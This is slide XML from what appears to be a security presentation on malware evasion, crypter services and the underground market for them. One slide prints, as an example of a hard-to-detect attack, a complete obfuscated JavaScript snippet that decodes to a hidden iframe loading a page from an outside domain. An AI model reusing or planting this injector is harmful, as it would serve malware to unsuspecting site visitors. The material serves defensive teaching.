              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Good, The Bad, &amp; The Ugly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some make more claims than others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some are false claims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some false claims are the result of those deploying/selling, not the vendor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340519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Happens When We Get Realistic?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5078312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>" &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>asq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(){return n[i];};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>window;ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>=String["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>fro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>mC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>harC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>o"+"de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>"];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>document.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>=~1}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>dgsgsdg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>zz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>=12*2+1+1;whwej=12;}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>whwej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>{}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>agdsg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>whwej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>=0;}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>document.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>--;}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>bawetawe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>ww.document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x7a,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x7a,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x68,0x6d,0x70,0x63,0x62,0x6d,0x77,0x66,0x6f,0x75,0x76,0x73,0x66,0x64,0x70,0x6f,0x74,0x70,0x73,0x75,0x6a,0x76,0x6e,0x2f,0x64,0x70,0x2f,0x76,0x6c,0x30,0x60,0x64,0x70,0x6f,0x75,0x66,0x6f,0x75,0x30,0x64,0x6f,0x75,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7a,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7a,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7a,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7a,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7a,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7a,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x7a,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x7a,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x7a,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x7a,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");h=2;s="";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>whwej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>){for(i=0;i-467!=0;i++){k=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>i;s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>s.concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>asq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>())-1));}z=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>s;ww</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>"](""+s);}}}}&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20866612">
            <a:off x="6288259" y="4006591"/>
            <a:ext cx="1913206" cy="180066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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It’s extremely difficult to detect obfuscated attacks!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="739628" y="2052844"/>
            <a:ext cx="4468907" cy="28023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395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28344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evasion Baked-In</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="sniff2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="43265"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="382033" y="958615"/>
            <a:ext cx="8379935" cy="5193741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5011167" y="1408189"/>
            <a:ext cx="2415852" cy="938789"/>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Evasion used to avoid detection of a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34118743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Underground Economy Insight - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UFOCrypt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="1014984"/>
            <a:ext cx="8476029" cy="3600986"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="227013" lvl="1" indent="-227013">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Crypters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> bypass anti-malware and other security solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227013" lvl="1" indent="-227013">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>bots, banking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, password stealers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (“blockers”), etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227013" lvl="1" indent="-227013">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Crypter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> service - $20 per bot, cheap and effective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227013" lvl="1" indent="-227013">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="227013" lvl="1" indent="-227013">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="227013" lvl="1" indent="-227013">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2013-03-28 at 5.28.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574" y="2724186"/>
            <a:ext cx="8479406" cy="34613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43585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28344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evasion-as-a-Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2014-06-04 at 11.38.0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6923"/>
            <a:ext cx="9144000" cy="4820478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179462" y="3129566"/>
            <a:ext cx="1905074" cy="2202288"/>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lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Crypters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>bypass anti-malware and other security solutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26000811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76048"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware Software Development Lifecycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screen Shot 2014-06-04 at 11.48.1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6048"/>
            <a:ext cx="9144000" cy="949901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="Screen Shot 2014-06-04 at 11.59.37 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="37" b="59528"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1920713"/>
            <a:ext cx="6625910" cy="4845591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19162804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Bypassing Security Isn’t Difficult</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1168400"/>
            <a:ext cx="9144000" cy="4508851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400300" y="3543300"/>
            <a:ext cx="6743700" cy="2806700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3164705" y="1648419"/>
            <a:ext cx="5290497" cy="18781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9848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stuff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
